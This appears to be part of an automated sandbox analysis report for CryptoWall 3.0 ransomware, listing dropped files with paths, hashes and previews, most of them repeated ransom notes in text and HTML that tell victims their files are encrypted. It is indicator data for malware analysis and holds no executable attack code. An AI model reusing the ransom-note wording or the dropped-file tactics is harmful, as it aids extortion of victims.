                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Outlook\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Outlook\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\PlayReady\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1918
                                                                                                                          Entropy (8bit):7.770366939156214
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgLUDX1N54dE5TWJwiA+P17YuqYq/4jL1uKnLulxetx:cztoDAUDZ5oJV7tq9cLcKLjx
                                                                                                                          MD5:8798046759AB3AF89ED26DD4348AF901
                                                                                                                          SHA1:A2C4073B0DDE315F11F93A9817B728B66665336E
                                                                                                                          SHA-256:F9AEAF521CD1C6C989DECB96ABF12487846683BBE367AD8F4806E090F49D4C14
                                                                                                                          SHA-512:3F2E1FAC9A5088FDD8FD21086CF6A6B66979ED9E1859A0CEB5F3AC36138C68D4B62E87BE4D6FE6A4984C113CA4A7AF36163FA9077F8564E5A97BAADEAFF95DB0
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.....)."......K....3;G.....A...H.xx.9..o.......H.x....|.K^.lA.O3qhI....|..s.....&..'Eo.....e..M&K=..r...m...........Z.a.o,a..w)....^............mY......7.k..|....?,....0@h..j...L....2....v<..gf...D.;*#....V..Z.z........4...b....1....|.6......H..I.V..?..~O. ...\W..~...aN....Z<%....".....u..O..0. .G.....g...p.!..I.a.:...<D1..#.-..f.}T.........{57../.E.LZ..4../.U.q.4P..|.H...1...T...=..Q.....j.....n#&...]_-.k.....D..8l...@..wB.U.....,..z..'..^a.gl..#B7fM-...dv~.z.,.8.....z=q~...Z.s...O...`..oU..".tj;.v...o../x{...,.3W.........Z..x.n........N.6...M.....b..y. /..X.@..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2766
                                                                                                                          Entropy (8bit):7.874635302470787
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDg7S8CJt0IT2CM5Z3VESHCybpgbKnxvRqUDklAeSny9:cztoDr8CgIT21v3VfxpEKeowGy9
                                                                                                                          MD5:0A7832618AA20DB05CDD173B8F944E1C
                                                                                                                          SHA1:61CA681B5BBD91D6CD6CE65C622AA18C5636B9B5
                                                                                                                          SHA-256:154DE12C528D8C0095153DD9FD506BD31624841954E1B2E2D6E3C37892DEE26E
                                                                                                                          SHA-512:831F3FA6E270CFB2D922F8701779D854FDF7C1546CF8582B20896DAB038AA9545AFD4B57A7C6CE94617AC5396F107BBF6DAEFF5FD9E5DE7B37E355970C1CB1F8
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...B.8.jO ..8...........i..<....4...8.pu..n.(..>0.q-...S..z.n.EG._...#.b9.<.h........<[._i.c.?.@.i._.`w.......a..TWtp.C...'.]......O....o.?.O....]2... a.t.!.s6.a[.):.bu.X ...3....+y.l.V..h.]..&..(.e........._^^5nW%..xj^..N.o.%!1...ZJ..]...Lts....#'..;.T.x......)&..f.S!>GV-..8Y..k....A..`\&.....'..<o...b^..T.G..,.O.o..k..)G...%.`X.~...hc....,.....1'........Z...zs.a....=\..m..FUA1.M...RN.Db.f.......ZR..8X.~..Kp...e".../.#..}.1.t@.=.L.B..H^zg...R.>:.OW..m....Z.gZ9.0n<..R..d...lU.$...V.97wyh...t.5gvB.y.i.i:c.E.n.Q.PQ...f......g.~_..h.[.,..x.d.sG......w....)..z.Q..v.....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8350
                                                                                                                          Entropy (8bit):7.969185143276263
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GoLzQmlB2dQeINLDzs96g1ERZTikOROFkeS8iFqSTaJTTuXjIbc:GOzrJhz3bTikNaeFEqZ/uXj9
                                                                                                                          MD5:923F96EFE00E329A2EF0E95597A2B3FC
                                                                                                                          SHA1:A69F0879508998A4D95E62E90ADED3A20FD7DDD4
                                                                                                                          SHA-256:476B2E30AB4A7459DFDB9E822B2E9B43DA23612E7364AAFFB1F34BC15DE1F10A
                                                                                                                          SHA-512:D7EB551CBDA2A8EBE0F71953BA11F9054A3208B19530602BC8878A6A006181C095ED8647718104F8ACFBB489529FE26176EFA6A7A77504A8DB9A93AD1386EE4C
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...........CWk.......frlj..P.....|....6m.........-.8#...<5p...t...L../i..0.....w........f.X.X...Cs..!.q4..5dw.XE@......e?..$Z..Gf......j..W]=.C...........x...So.V.$xW.....j.0.........E....1.v.v.Pszj.2............\.W...K..4....F....0......Mg..z.:....c..X...u..jrR.k..Y..-.....~.b3.].....Vw....1c...)..t.....r....n.x\R............xd.I..'.gZ..K..P.._,...._..V1.....iOr.s'....&.N.1uv[.#.Y..Ef....O.gx.f....B8.a'.Y<..8.Y.."..z]..!%.*[jr.....4...{.._L.6}t.....Z...'C...qb.&..)....<.w...M%..V..v....h..d...........S.%.{..Hv@6U.l..+.{.)r..B..l......].r..>.;|.....ng..}+....'...y...=vN.;.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\History\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\History\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
